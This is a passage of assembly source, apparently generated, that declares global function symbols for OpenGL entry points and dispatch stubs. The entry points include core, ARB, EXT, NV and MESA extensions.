.globl glClearIndex ; .type glClearIndex,#function
.globl glClearColor ; .type glClearColor,#function
.globl glClearStencil ; .type glClearStencil,#function
.globl glClearDepth ; .type glClearDepth,#function
.globl glStencilMask ; .type glStencilMask,#function
.globl glColorMask ; .type glColorMask,#function
.globl glDepthMask ; .type glDepthMask,#function
.globl glIndexMask ; .type glIndexMask,#function
.globl glAccum ; .type glAccum,#function
.globl glDisable ; .type glDisable,#function
.globl glEnable ; .type glEnable,#function
.globl glFinish ; .type glFinish,#function
.globl glFlush ; .type glFlush,#function
.globl glPopAttrib ; .type glPopAttrib,#function
.globl glPushAttrib ; .type glPushAttrib,#function
.globl glMap1d ; .type glMap1d,#function
.globl glMap1f ; .type glMap1f,#function
.globl glMap2d ; .type glMap2d,#function
.globl glMap2f ; .type glMap2f,#function
.globl glMapGrid1d ; .type glMapGrid1d,#function
.globl glMapGrid1f ; .type glMapGrid1f,#function
.globl glMapGrid2d ; .type glMapGrid2d,#function
.globl glMapGrid2f ; .type glMapGrid2f,#function
.globl glEvalCoord1d ; .type glEvalCoord1d,#function
.globl glEvalCoord1dv ; .type glEvalCoord1dv,#function
.globl glEvalCoord1f ; .type glEvalCoord1f,#function
.globl glEvalCoord1fv ; .type glEvalCoord1fv,#function
.globl glEvalCoord2d ; .type glEvalCoord2d,#function
.globl glEvalCoord2dv ; .type glEvalCoord2dv,#function
.globl glEvalCoord2f ; .type glEvalCoord2f,#function
.globl glEvalCoord2fv ; .type glEvalCoord2fv,#function
.globl glEvalMesh1 ; .type glEvalMesh1,#function
.globl glEvalPoint1 ; .type glEvalPoint1,#function
.globl glEvalMesh2 ; .type glEvalMesh2,#function
.globl glEvalPoint2 ; .type glEvalPoint2,#function
.globl glAlphaFunc ; .type glAlphaFunc,#function
.globl glBlendFunc ; .type glBlendFunc,#function
.globl glLogicOp ; .type glLogicOp,#function
.globl glStencilFunc ; .type glStencilFunc,#function
.globl glStencilOp ; .type glStencilOp,#function
.globl glDepthFunc ; .type glDepthFunc,#function
.globl glPixelZoom ; .type glPixelZoom,#function
.globl glPixelTransferf ; .type glPixelTransferf,#function
.globl glPixelTransferi ; .type glPixelTransferi,#function
.globl glPixelStoref ; .type glPixelStoref,#function
.globl glPixelStorei ; .type glPixelStorei,#function
.globl glPixelMapfv ; .type glPixelMapfv,#function
.globl glPixelMapuiv ; .type glPixelMapuiv,#function
.globl glPixelMapusv ; .type glPixelMapusv,#function
.globl glReadBuffer ; .type glReadBuffer,#function
.globl glCopyPixels ; .type glCopyPixels,#function
.globl glReadPixels ; .type glReadPixels,#function
.globl glDrawPixels ; .type glDrawPixels,#function
.globl glGetBooleanv ; .type glGetBooleanv,#function
.globl glGetClipPlane ; .type glGetClipPlane,#function
.globl glGetDoublev ; .type glGetDoublev,#function
.globl glGetError ; .type glGetError,#function
.globl glGetFloatv ; .type glGetFloatv,#function
.globl glGetIntegerv ; .type glGetIntegerv,#function
.globl glGetLightfv ; .type glGetLightfv,#function
.globl glGetLightiv ; .type glGetLightiv,#function
.globl glGetMapdv ; .type glGetMapdv,#function
.globl glGetMapfv ; .type glGetMapfv,#function
.globl glGetMapiv ; .type glGetMapiv,#function
.globl glGetMaterialfv ; .type glGetMaterialfv,#function
.globl glGetMaterialiv ; .type glGetMaterialiv,#function
.globl glGetPixelMapfv ; .type glGetPixelMapfv,#function
.globl glGetPixelMapuiv ; .type glGetPixelMapuiv,#function
.globl glGetPixelMapusv ; .type glGetPixelMapusv,#function
.globl glGetPolygonStipple ; .type glGetPolygonStipple,#function
.globl glGetString ; .type glGetString,#function
.globl glGetTexEnvfv ; .type glGetTexEnvfv,#function
.globl glGetTexEnviv ; .type glGetTexEnviv,#function
.globl glGetTexGendv ; .type glGetTexGendv,#function
.globl glGetTexGenfv ; .type glGetTexGenfv,#function
.globl glGetTexGeniv ; .type glGetTexGeniv,#function
.globl glGetTexImage ; .type glGetTexImage,#function
.globl glGetTexParameterfv ; .type glGetTexParameterfv,#function
.globl glGetTexParameteriv ; .type glGetTexParameteriv,#function
.globl glGetTexLevelParameterfv ; .type glGetTexLevelParameterfv,#function
.globl glGetTexLevelParameteriv ; .type glGetTexLevelParameteriv,#function
.globl glIsEnabled ; .type glIsEnabled,#function
.globl glIsList ; .type glIsList,#function
.globl glDepthRange ; .type glDepthRange,#function
.globl glFrustum ; .type glFrustum,#function
.globl glLoadIdentity ; .type glLoadIdentity,#function
.globl glLoadMatrixf ; .type glLoadMatrixf,#function
.globl glLoadMatrixd ; .type glLoadMatrixd,#function
.globl glMatrixMode ; .type glMatrixMode,#function
.globl glMultMatrixf ; .type glMultMatrixf,#function
.globl glMultMatrixd ; .type glMultMatrixd,#function
.globl glOrtho ; .type glOrtho,#function
.globl glPopMatrix ; .type glPopMatrix,#function
.globl glPushMatrix ; .type glPushMatrix,#function
.globl glRotated ; .type glRotated,#function
.globl glRotatef ; .type glRotatef,#function
.globl glScaled ; .type glScaled,#function
.globl glScalef ; .type glScalef,#function
.globl glTranslated ; .type glTranslated,#function
.globl glTranslatef ; .type glTranslatef,#function
.globl glViewport ; .type glViewport,#function
.globl glArrayElement ; .type glArrayElement,#function
.globl glBindTexture ; .type glBindTexture,#function
.globl glColorPointer ; .type glColorPointer,#function
.globl glDisableClientState ; .type glDisableClientState,#function
.globl glDrawArrays ; .type glDrawArrays,#function
.globl glDrawElements ; .type glDrawElements,#function
.globl glEdgeFlagPointer ; .type glEdgeFlagPointer,#function
.globl glEnableClientState ; .type glEnableClientState,#function
.globl glIndexPointer ; .type glIndexPointer,#function
.globl glIndexub ; .type glIndexub,#function
.globl glIndexubv ; .type glIndexubv,#function
.globl glInterleavedArrays ; .type glInterleavedArrays,#function
.globl glNormalPointer ; .type glNormalPointer,#function
.globl glPolygonOffset ; .type glPolygonOffset,#function
.globl glTexCoordPointer ; .type glTexCoordPointer,#function
.globl glVertexPointer ; .type glVertexPointer,#function
.globl glAreTexturesResident ; .type glAreTexturesResident,#function
.globl glCopyTexImage1D ; .type glCopyTexImage1D,#function
.globl glCopyTexImage2D ; .type glCopyTexImage2D,#function
.globl glCopyTexSubImage1D ; .type glCopyTexSubImage1D,#function
.globl glCopyTexSubImage2D ; .type glCopyTexSubImage2D,#function
.globl glDeleteTextures ; .type glDeleteTextures,#function
.globl glGenTextures ; .type glGenTextures,#function
.globl glGetPointerv ; .type glGetPointerv,#function
.globl glIsTexture ; .type glIsTexture,#function
.globl glPrioritizeTextures ; .type glPrioritizeTextures,#function
.globl glTexSubImage1D ; .type glTexSubImage1D,#function
.globl glTexSubImage2D ; .type glTexSubImage2D,#function
.globl glPopClientAttrib ; .type glPopClientAttrib,#function
.globl glPushClientAttrib ; .type glPushClientAttrib,#function
.globl glBlendColor ; .type glBlendColor,#function
.globl glBlendEquation ; .type glBlendEquation,#function
.globl glDrawRangeElements ; .type glDrawRangeElements,#function
.globl glColorTable ; .type glColorTable,#function
.globl glColorTableParameterfv ; .type glColorTableParameterfv,#function
.globl glColorTableParameteriv ; .type glColorTableParameteriv,#function
.globl glCopyColorTable ; .type glCopyColorTable,#function
.globl glGetColorTable ; .type glGetColorTable,#function
.globl glGetColorTableParameterfv ; .type glGetColorTableParameterfv,#function
.globl glGetColorTableParameteriv ; .type glGetColorTableParameteriv,#function
.globl glColorSubTable ; .type glColorSubTable,#function
.globl glCopyColorSubTable ; .type glCopyColorSubTable,#function
.globl glConvolutionFilter1D ; .type glConvolutionFilter1D,#function
.globl glConvolutionFilter2D ; .type glConvolutionFilter2D,#function
.globl glConvolutionParameterf ; .type glConvolutionParameterf,#function
.globl glConvolutionParameterfv ; .type glConvolutionParameterfv,#function
.globl glConvolutionParameteri ; .type glConvolutionParameteri,#function
.globl glConvolutionParameteriv ; .type glConvolutionParameteriv,#function
.globl glCopyConvolutionFilter1D ; .type glCopyConvolutionFilter1D,#function
.globl glCopyConvolutionFilter2D ; .type glCopyConvolutionFilter2D,#function
.globl glGetConvolutionFilter ; .type glGetConvolutionFilter,#function
.globl glGetConvolutionParameterfv ; .type glGetConvolutionParameterfv,#function
.globl glGetConvolutionParameteriv ; .type glGetConvolutionParameteriv,#function
.globl glGetSeparableFilter ; .type glGetSeparableFilter,#function
.globl glSeparableFilter2D ; .type glSeparableFilter2D,#function
.globl glGetHistogram ; .type glGetHistogram,#function
.globl glGetHistogramParameterfv ; .type glGetHistogramParameterfv,#function
.globl glGetHistogramParameteriv ; .type glGetHistogramParameteriv,#function
.globl glGetMinmax ; .type glGetMinmax,#function
.globl glGetMinmaxParameterfv ; .type glGetMinmaxParameterfv,#function
.globl glGetMinmaxParameteriv ; .type glGetMinmaxParameteriv,#function
.globl glHistogram ; .type glHistogram,#function
.globl glMinmax ; .type glMinmax,#function
.globl glResetHistogram ; .type glResetHistogram,#function
.globl glResetMinmax ; .type glResetMinmax,#function
.globl glTexImage3D ; .type glTexImage3D,#function
.globl glTexSubImage3D ; .type glTexSubImage3D,#function
.globl glCopyTexSubImage3D ; .type glCopyTexSubImage3D,#function
.globl glActiveTextureARB ; .type glActiveTextureARB,#function
.globl glClientActiveTextureARB ; .type glClientActiveTextureARB,#function
.globl glMultiTexCoord1dARB ; .type glMultiTexCoord1dARB,#function
.globl glMultiTexCoord1dvARB ; .type glMultiTexCoord1dvARB,#function
.globl glMultiTexCoord1fARB ; .type glMultiTexCoord1fARB,#function
.globl glMultiTexCoord1fvARB ; .type glMultiTexCoord1fvARB,#function
.globl glMultiTexCoord1iARB ; .type glMultiTexCoord1iARB,#function
.globl glMultiTexCoord1ivARB ; .type glMultiTexCoord1ivARB,#function
.globl glMultiTexCoord1sARB ; .type glMultiTexCoord1sARB,#function
.globl glMultiTexCoord1svARB ; .type glMultiTexCoord1svARB,#function
.globl glMultiTexCoord2dARB ; .type glMultiTexCoord2dARB,#function
.globl glMultiTexCoord2dvARB ; .type glMultiTexCoord2dvARB,#function
.globl glMultiTexCoord2fARB ; .type glMultiTexCoord2fARB,#function
.globl glMultiTexCoord2fvARB ; .type glMultiTexCoord2fvARB,#function
.globl glMultiTexCoord2iARB ; .type glMultiTexCoord2iARB,#function
.globl glMultiTexCoord2ivARB ; .type glMultiTexCoord2ivARB,#function
.globl glMultiTexCoord2sARB ; .type glMultiTexCoord2sARB,#function
.globl glMultiTexCoord2svARB ; .type glMultiTexCoord2svARB,#function
.globl glMultiTexCoord3dARB ; .type glMultiTexCoord3dARB,#function
.globl glMultiTexCoord3dvARB ; .type glMultiTexCoord3dvARB,#function
.globl glMultiTexCoord3fARB ; .type glMultiTexCoord3fARB,#function
.globl glMultiTexCoord3fvARB ; .type glMultiTexCoord3fvARB,#function
.globl glMultiTexCoord3iARB ; .type glMultiTexCoord3iARB,#function
.globl glMultiTexCoord3ivARB ; .type glMultiTexCoord3ivARB,#function
.globl glMultiTexCoord3sARB ; .type glMultiTexCoord3sARB,#function
.globl glMultiTexCoord3svARB ; .type glMultiTexCoord3svARB,#function
.globl glMultiTexCoord4dARB ; .type glMultiTexCoord4dARB,#function
.globl glMultiTexCoord4dvARB ; .type glMultiTexCoord4dvARB,#function
.globl glMultiTexCoord4fARB ; .type glMultiTexCoord4fARB,#function
.globl glMultiTexCoord4fvARB ; .type glMultiTexCoord4fvARB,#function
.globl glMultiTexCoord4iARB ; .type glMultiTexCoord4iARB,#function
.globl glMultiTexCoord4ivARB ; .type glMultiTexCoord4ivARB,#function
.globl glMultiTexCoord4sARB ; .type glMultiTexCoord4sARB,#function
.globl glMultiTexCoord4svARB ; .type glMultiTexCoord4svARB,#function
.globl glAttachShader ; .type glAttachShader,#function
.globl glCreateProgram ; .type glCreateProgram,#function
.globl glCreateShader ; .type glCreateShader,#function
.globl glDeleteProgram ; .type glDeleteProgram,#function
.globl glDeleteShader ; .type glDeleteShader,#function
.globl glDetachShader ; .type glDetachShader,#function
.globl glGetAttachedShaders ; .type glGetAttachedShaders,#function
.globl glGetProgramInfoLog ; .type glGetProgramInfoLog,#function
.globl glGetProgramiv ; .type glGetProgramiv,#function
.globl glGetShaderInfoLog ; .type glGetShaderInfoLog,#function
.globl glGetShaderiv ; .type glGetShaderiv,#function
.globl glIsProgram ; .type glIsProgram,#function
.globl glIsShader ; .type glIsShader,#function
.globl glStencilFuncSeparate ; .type glStencilFuncSeparate,#function
.globl glStencilMaskSeparate ; .type glStencilMaskSeparate,#function
.globl glStencilOpSeparate ; .type glStencilOpSeparate,#function
.globl glUniformMatrix2x3fv ; .type glUniformMatrix2x3fv,#function
.globl glUniformMatrix2x4fv ; .type glUniformMatrix2x4fv,#function
.globl glUniformMatrix3x2fv ; .type glUniformMatrix3x2fv,#function
.globl glUniformMatrix3x4fv ; .type glUniformMatrix3x4fv,#function
.globl glUniformMatrix4x2fv ; .type glUniformMatrix4x2fv,#function
.globl glUniformMatrix4x3fv ; .type glUniformMatrix4x3fv,#function
.globl glLoadTransposeMatrixdARB ; .type glLoadTransposeMatrixdARB,#function
.globl glLoadTransposeMatrixfARB ; .type glLoadTransposeMatrixfARB,#function
.globl glMultTransposeMatrixdARB ; .type glMultTransposeMatrixdARB,#function
.globl glMultTransposeMatrixfARB ; .type glMultTransposeMatrixfARB,#function
.globl glSampleCoverageARB ; .type glSampleCoverageARB,#function
.globl glCompressedTexImage1DARB ; .type glCompressedTexImage1DARB,#function
.globl glCompressedTexImage2DARB ; .type glCompressedTexImage2DARB,#function
.globl glCompressedTexImage3DARB ; .type glCompressedTexImage3DARB,#function
.globl glCompressedTexSubImage1DARB ; .type glCompressedTexSubImage1DARB,#function
.globl glCompressedTexSubImage2DARB ; .type glCompressedTexSubImage2DARB,#function
.globl glCompressedTexSubImage3DARB ; .type glCompressedTexSubImage3DARB,#function
.globl glGetCompressedTexImageARB ; .type glGetCompressedTexImageARB,#function
.globl glDisableVertexAttribArrayARB ; .type glDisableVertexAttribArrayARB,#function
.globl glEnableVertexAttribArrayARB ; .type glEnableVertexAttribArrayARB,#function
.globl glGetProgramEnvParameterdvARB ; .type glGetProgramEnvParameterdvARB,#function
.globl glGetProgramEnvParameterfvARB ; .type glGetProgramEnvParameterfvARB,#function
.globl glGetProgramLocalParameterdvARB ; .type glGetProgramLocalParameterdvARB,#function
.globl glGetProgramLocalParameterfvARB ; .type glGetProgramLocalParameterfvARB,#function
.globl glGetProgramStringARB ; .type glGetProgramStringARB,#function
.globl glGetProgramivARB ; .type glGetProgramivARB,#function
.globl glGetVertexAttribdvARB ; .type glGetVertexAttribdvARB,#function
.globl glGetVertexAttribfvARB ; .type glGetVertexAttribfvARB,#function
.globl glGetVertexAttribivARB ; .type glGetVertexAttribivARB,#function
.globl glProgramEnvParameter4dARB ; .type glProgramEnvParameter4dARB,#function
.globl glProgramEnvParameter4dvARB ; .type glProgramEnvParameter4dvARB,#function
.globl glProgramEnvParameter4fARB ; .type glProgramEnvParameter4fARB,#function
.globl glProgramEnvParameter4fvARB ; .type glProgramEnvParameter4fvARB,#function
.globl glProgramLocalParameter4dARB ; .type glProgramLocalParameter4dARB,#function
.globl glProgramLocalParameter4dvARB ; .type glProgramLocalParameter4dvARB,#function
.globl glProgramLocalParameter4fARB ; .type glProgramLocalParameter4fARB,#function
.globl glProgramLocalParameter4fvARB ; .type glProgramLocalParameter4fvARB,#function
.globl glProgramStringARB ; .type glProgramStringARB,#function
.globl glVertexAttrib1dARB ; .type glVertexAttrib1dARB,#function
.globl glVertexAttrib1dvARB ; .type glVertexAttrib1dvARB,#function
.globl glVertexAttrib1fARB ; .type glVertexAttrib1fARB,#function
.globl glVertexAttrib1fvARB ; .type glVertexAttrib1fvARB,#function
.globl glVertexAttrib1sARB ; .type glVertexAttrib1sARB,#function
.globl glVertexAttrib1svARB ; .type glVertexAttrib1svARB,#function
.globl glVertexAttrib2dARB ; .type glVertexAttrib2dARB,#function
.globl glVertexAttrib2dvARB ; .type glVertexAttrib2dvARB,#function
.globl glVertexAttrib2fARB ; .type glVertexAttrib2fARB,#function
.globl glVertexAttrib2fvARB ; .type glVertexAttrib2fvARB,#function
.globl glVertexAttrib2sARB ; .type glVertexAttrib2sARB,#function
.globl glVertexAttrib2svARB ; .type glVertexAttrib2svARB,#function
.globl glVertexAttrib3dARB ; .type glVertexAttrib3dARB,#function
.globl glVertexAttrib3dvARB ; .type glVertexAttrib3dvARB,#function
.globl glVertexAttrib3fARB ; .type glVertexAttrib3fARB,#function
.globl glVertexAttrib3fvARB ; .type glVertexAttrib3fvARB,#function
.globl glVertexAttrib3sARB ; .type glVertexAttrib3sARB,#function
.globl glVertexAttrib3svARB ; .type glVertexAttrib3svARB,#function
.globl glVertexAttrib4NbvARB ; .type glVertexAttrib4NbvARB,#function
.globl glVertexAttrib4NivARB ; .type glVertexAttrib4NivARB,#function
.globl glVertexAttrib4NsvARB ; .type glVertexAttrib4NsvARB,#function
.globl glVertexAttrib4NubARB ; .type glVertexAttrib4NubARB,#function
.globl glVertexAttrib4NubvARB ; .type glVertexAttrib4NubvARB,#function
.globl glVertexAttrib4NuivARB ; .type glVertexAttrib4NuivARB,#function
.globl glVertexAttrib4NusvARB ; .type glVertexAttrib4NusvARB,#function
.globl glVertexAttrib4bvARB ; .type glVertexAttrib4bvARB,#function
.globl glVertexAttrib4dARB ; .type glVertexAttrib4dARB,#function
.globl glVertexAttrib4dvARB ; .type glVertexAttrib4dvARB,#function
.globl glVertexAttrib4fARB ; .type glVertexAttrib4fARB,#function
.globl glVertexAttrib4fvARB ; .type glVertexAttrib4fvARB,#function
.globl glVertexAttrib4ivARB ; .type glVertexAttrib4ivARB,#function
.globl glVertexAttrib4sARB ; .type glVertexAttrib4sARB,#function
.globl glVertexAttrib4svARB ; .type glVertexAttrib4svARB,#function
.globl glVertexAttrib4ubvARB ; .type glVertexAttrib4ubvARB,#function
.globl glVertexAttrib4uivARB ; .type glVertexAttrib4uivARB,#function
.globl glVertexAttrib4usvARB ; .type glVertexAttrib4usvARB,#function
.globl glVertexAttribPointerARB ; .type glVertexAttribPointerARB,#function
.globl glBindBufferARB ; .type glBindBufferARB,#function
.globl glBufferDataARB ; .type glBufferDataARB,#function
.globl glBufferSubDataARB ; .type glBufferSubDataARB,#function
.globl glDeleteBuffersARB ; .type glDeleteBuffersARB,#function
.globl glGenBuffersARB ; .type glGenBuffersARB,#function
.globl glGetBufferParameterivARB ; .type glGetBufferParameterivARB,#function
.globl glGetBufferPointervARB ; .type glGetBufferPointervARB,#function
.globl glGetBufferSubDataARB ; .type glGetBufferSubDataARB,#function
.globl glIsBufferARB ; .type glIsBufferARB,#function
.globl glMapBufferARB ; .type glMapBufferARB,#function
.globl glUnmapBufferARB ; .type glUnmapBufferARB,#function
.globl glBeginQueryARB ; .type glBeginQueryARB,#function
.globl glDeleteQueriesARB ; .type glDeleteQueriesARB,#function
.globl glEndQueryARB ; .type glEndQueryARB,#function
.globl glGenQueriesARB ; .type glGenQueriesARB,#function
.globl glGetQueryObjectivARB ; .type glGetQueryObjectivARB,#function
.globl glGetQueryObjectuivARB ; .type glGetQueryObjectuivARB,#function
.globl glGetQueryivARB ; .type glGetQueryivARB,#function
.globl glIsQueryARB ; .type glIsQueryARB,#function
.globl glAttachObjectARB ; .type glAttachObjectARB,#function
.globl glCompileShaderARB ; .type glCompileShaderARB,#function
.globl glCreateProgramObjectARB ; .type glCreateProgramObjectARB,#function
.globl glCreateShaderObjectARB ; .type glCreateShaderObjectARB,#function
.globl glDeleteObjectARB ; .type glDeleteObjectARB,#function
.globl glDetachObjectARB ; .type glDetachObjectARB,#function
.globl glGetActiveUniformARB ; .type glGetActiveUniformARB,#function
.globl glGetAttachedObjectsARB ; .type glGetAttachedObjectsARB,#function
.globl glGetHandleARB ; .type glGetHandleARB,#function
.globl glGetInfoLogARB ; .type glGetInfoLogARB,#function
.globl glGetObjectParameterfvARB ; .type glGetObjectParameterfvARB,#function
.globl glGetObjectParameterivARB ; .type glGetObjectParameterivARB,#function
.globl glGetShaderSourceARB ; .type glGetShaderSourceARB,#function
.globl glGetUniformLocationARB ; .type glGetUniformLocationARB,#function
.globl glGetUniformfvARB ; .type glGetUniformfvARB,#function
.globl glGetUniformivARB ; .type glGetUniformivARB,#function
.globl glLinkProgramARB ; .type glLinkProgramARB,#function
.globl glShaderSourceARB ; .type glShaderSourceARB,#function
.globl glUniform1fARB ; .type glUniform1fARB,#function
.globl glUniform1fvARB ; .type glUniform1fvARB,#function
.globl glUniform1iARB ; .type glUniform1iARB,#function
.globl glUniform1ivARB ; .type glUniform1ivARB,#function
.globl glUniform2fARB ; .type glUniform2fARB,#function
.globl glUniform2fvARB ; .type glUniform2fvARB,#function
.globl glUniform2iARB ; .type glUniform2iARB,#function
.globl glUniform2ivARB ; .type glUniform2ivARB,#function
.globl glUniform3fARB ; .type glUniform3fARB,#function
.globl glUniform3fvARB ; .type glUniform3fvARB,#function
.globl glUniform3iARB ; .type glUniform3iARB,#function
.globl glUniform3ivARB ; .type glUniform3ivARB,#function
.globl glUniform4fARB ; .type glUniform4fARB,#function
.globl glUniform4fvARB ; .type glUniform4fvARB,#function
.globl glUniform4iARB ; .type glUniform4iARB,#function
.globl glUniform4ivARB ; .type glUniform4ivARB,#function
.globl glUniformMatrix2fvARB ; .type glUniformMatrix2fvARB,#function
.globl glUniformMatrix3fvARB ; .type glUniformMatrix3fvARB,#function
.globl glUniformMatrix4fvARB ; .type glUniformMatrix4fvARB,#function
.globl glUseProgramObjectARB ; .type glUseProgramObjectARB,#function
.globl glValidateProgramARB ; .type glValidateProgramARB,#function
.globl glBindAttribLocationARB ; .type glBindAttribLocationARB,#function
.globl glGetActiveAttribARB ; .type glGetActiveAttribARB,#function
.globl glGetAttribLocationARB ; .type glGetAttribLocationARB,#function
.globl glDrawBuffersARB ; .type glDrawBuffersARB,#function
.globl glPolygonOffsetEXT ; .type glPolygonOffsetEXT,#function
.globl gl_dispatch_stub_562 ; .type gl_dispatch_stub_562,#function
.globl gl_dispatch_stub_563 ; .type gl_dispatch_stub_563,#function
.globl gl_dispatch_stub_564 ; .type gl_dispatch_stub_564,#function
.globl gl_dispatch_stub_565 ; .type gl_dispatch_stub_565,#function
.globl gl_dispatch_stub_566 ; .type gl_dispatch_stub_566,#function
.globl gl_dispatch_stub_567 ; .type gl_dispatch_stub_567,#function
.globl gl_dispatch_stub_568 ; .type gl_dispatch_stub_568,#function
.globl gl_dispatch_stub_569 ; .type gl_dispatch_stub_569,#function
.globl glColorPointerEXT ; .type glColorPointerEXT,#function
.globl glEdgeFlagPointerEXT ; .type glEdgeFlagPointerEXT,#function
.globl glIndexPointerEXT ; .type glIndexPointerEXT,#function
.globl glNormalPointerEXT ; .type glNormalPointerEXT,#function
.globl glTexCoordPointerEXT ; .type glTexCoordPointerEXT,#function
.globl glVertexPointerEXT ; .type glVertexPointerEXT,#function
.globl glPointParameterfEXT ; .type glPointParameterfEXT,#function
.globl glPointParameterfvEXT ; .type glPointParameterfvEXT,#function
.globl glLockArraysEXT ; .type glLockArraysEXT,#function
.globl glUnlockArraysEXT ; .type glUnlockArraysEXT,#function
.globl gl_dispatch_stub_580 ; .type gl_dispatch_stub_580,#function
.globl gl_dispatch_stub_581 ; .type gl_dispatch_stub_581,#function
.globl glSecondaryColor3bEXT ; .type glSecondaryColor3bEXT,#function
.globl glSecondaryColor3bvEXT ; .type glSecondaryColor3bvEXT,#function
.globl glSecondaryColor3dEXT ; .type glSecondaryColor3dEXT,#function
.globl glSecondaryColor3dvEXT ; .type glSecondaryColor3dvEXT,#function
.globl glSecondaryColor3fEXT ; .type glSecondaryColor3fEXT,#function
.globl glSecondaryColor3fvEXT ; .type glSecondaryColor3fvEXT,#function
.globl glSecondaryColor3iEXT ; .type glSecondaryColor3iEXT,#function
.globl glSecondaryColor3ivEXT ; .type glSecondaryColor3ivEXT,#function
.globl glSecondaryColor3sEXT ; .type glSecondaryColor3sEXT,#function
.globl glSecondaryColor3svEXT ; .type glSecondaryColor3svEXT,#function
.globl glSecondaryColor3ubEXT ; .type glSecondaryColor3ubEXT,#function
.globl glSecondaryColor3ubvEXT ; .type glSecondaryColor3ubvEXT,#function
.globl glSecondaryColor3uiEXT ; .type glSecondaryColor3uiEXT,#function
.globl glSecondaryColor3uivEXT ; .type glSecondaryColor3uivEXT,#function
.globl glSecondaryColor3usEXT ; .type glSecondaryColor3usEXT,#function
.globl glSecondaryColor3usvEXT ; .type glSecondaryColor3usvEXT,#function
.globl glSecondaryColorPointerEXT ; .type glSecondaryColorPointerEXT,#function
.globl glMultiDrawArraysEXT ; .type glMultiDrawArraysEXT,#function
.globl glMultiDrawElementsEXT ; .type glMultiDrawElementsEXT,#function
.globl glFogCoordPointerEXT ; .type glFogCoordPointerEXT,#function
.globl glFogCoorddEXT ; .type glFogCoorddEXT,#function
.globl glFogCoorddvEXT ; .type glFogCoorddvEXT,#function
.globl glFogCoordfEXT ; .type glFogCoordfEXT,#function
.globl glFogCoordfvEXT ; .type glFogCoordfvEXT,#function
.globl gl_dispatch_stub_606 ; .type gl_dispatch_stub_606,#function
.globl glBlendFuncSeparateEXT ; .type glBlendFuncSeparateEXT,#function
.globl glFlushVertexArrayRangeNV ; .type glFlushVertexArrayRangeNV,#function
.globl glVertexArrayRangeNV ; .type glVertexArrayRangeNV,#function
.globl glCombinerInputNV ; .type glCombinerInputNV,#function
.globl glCombinerOutputNV ; .type glCombinerOutputNV,#function
.globl glCombinerParameterfNV ; .type glCombinerParameterfNV,#function
.globl glCombinerParameterfvNV ; .type glCombinerParameterfvNV,#function
.globl glCombinerParameteriNV ; .type glCombinerParameteriNV,#function
.globl glCombinerParameterivNV ; .type glCombinerParameterivNV,#function
.globl glFinalCombinerInputNV ; .type glFinalCombinerInputNV,#function
.globl glGetCombinerInputParameterfvNV ; .type glGetCombinerInputParameterfvNV,#function
.globl glGetCombinerInputParameterivNV ; .type glGetCombinerInputParameterivNV,#function
.globl glGetCombinerOutputParameterfvNV ; .type glGetCombinerOutputParameterfvNV,#function
.globl glGetCombinerOutputParameterivNV ; .type glGetCombinerOutputParameterivNV,#function
.globl glGetFinalCombinerInputParameterfvNV ; .type glGetFinalCombinerInputParameterfvNV,#function
.globl glGetFinalCombinerInputParameterivNV ; .type glGetFinalCombinerInputParameterivNV,#function
.globl glResizeBuffersMESA ; .type glResizeBuffersMESA,#function
.globl glWindowPos2dMESA ; .type glWindowPos2dMESA,#function
.globl glWindowPos2dvMESA ; .type glWindowPos2dvMESA,#function
.globl glWindowPos2fMESA ; .type glWindowPos2fMESA,#function
.globl glWindowPos2fvMESA ; .type glWindowPos2fvMESA,#function
.globl glWindowPos2iMESA ; .type glWindowPos2iMESA,#function
.globl glWindowPos2ivMESA ; .type glWindowPos2ivMESA,#function
.globl glWindowPos2sMESA ; .type glWindowPos2sMESA,#function
.globl glWindowPos2svMESA ; .type glWindowPos2svMESA,#function
.globl glWindowPos3dMESA ; .type glWindowPos3dMESA,#function
.globl glWindowPos3dvMESA ; .type glWindowPos3dvMESA,#function
.globl glWindowPos3fMESA ; .type glWindowPos3fMESA,#function
.globl glWindowPos3fvMESA ; .type glWindowPos3fvMESA,#function
.globl glWindowPos3iMESA ; .type glWindowPos3iMESA,#function
.globl glWindowPos3ivMESA ; .type glWindowPos3ivMESA,#function
.globl glWindowPos3sMESA ; .type glWindowPos3sMESA,#function
.globl glWindowPos3svMESA ; .type glWindowPos3svMESA,#function
.globl glWindowPos4dMESA ; .type glWindowPos4dMESA,#function
.globl glWindowPos4dvMESA ; .type glWindowPos4dvMESA,#function
.globl glWindowPos4fMESA ; .type glWindowPos4fMESA,#function
.globl glWindowPos4fvMESA ; .type glWindowPos4fvMESA,#function
.globl glWindowPos4iMESA ; .type glWindowPos4iMESA,#function
.globl glWindowPos4ivMESA ; .type glWindowPos4ivMESA,#function
.globl glWindowPos4sMESA ; .type glWindowPos4sMESA,#function
.globl glWindowPos4svMESA ; .type glWindowPos4svMESA,#function
.globl gl_dispatch_stub_648 ; .type gl_dispatch_stub_648,#function
.globl gl_dispatch_stub_649 ; .type gl_dispatch_stub_649,#function
.globl gl_dispatch_stub_650 ; .type gl_dispatch_stub_650,#function
.globl gl_dispatch_stub_651 ; .type gl_dispatch_stub_651,#function
.globl gl_dispatch_stub_652 ; .type gl_dispatch_stub_652,#function
.globl gl_dispatch_stub_653 ; .type gl_dispatch_stub_653,#function
.globl gl_dispatch_stub_654 ; .type gl_dispatch_stub_654,#function
.globl gl_dispatch_stub_655 ; .type gl_dispatch_stub_655,#function
.globl gl_dispatch_stub_656 ; .type gl_dispatch_stub_656,#function
.globl glAreProgramsResidentNV ; .type glAreProgramsResidentNV,#function
.globl glBindProgramNV ; .type glBindProgramNV,#function
.globl glDeleteProgramsNV ; .type glDeleteProgramsNV,#function
.globl glExecuteProgramNV ; .type glExecuteProgramNV,#function
.globl glGenProgramsNV ; .type glGenProgramsNV,#function
.globl glGetProgramParameterdvNV ; .type glGetProgramParameterdvNV,#function
.globl glGetProgramParameterfvNV ; .type glGetProgramParameterfvNV,#function
.globl glGetProgramStringNV ; .type glGetProgramStringNV,#function
.globl glGetProgramivNV ; .type glGetProgramivNV,#function
.globl glGetTrackMatrixivNV ; .type glGetTrackMatrixivNV,#function
.globl glGetVertexAttribPointervNV ; .type glGetVertexAttribPointervNV,#function
.globl glGetVertexAttribdvNV ; .type glGetVertexAttribdvNV,#function
.globl glGetVertexAttribfvNV ; .type glGetVertexAttribfvNV,#function
.globl glGetVertexAttribivNV ; .type glGetVertexAttribivNV,#function
.globl glIsProgramNV ; .type glIsProgramNV,#function
.globl glLoadProgramNV ; .type glLoadProgramNV,#function
.globl glProgramParameters4dvNV ; .type glProgramParameters4dvNV,#function
.globl glProgramParameters4fvNV ; .type glProgramParameters4fvNV,#function
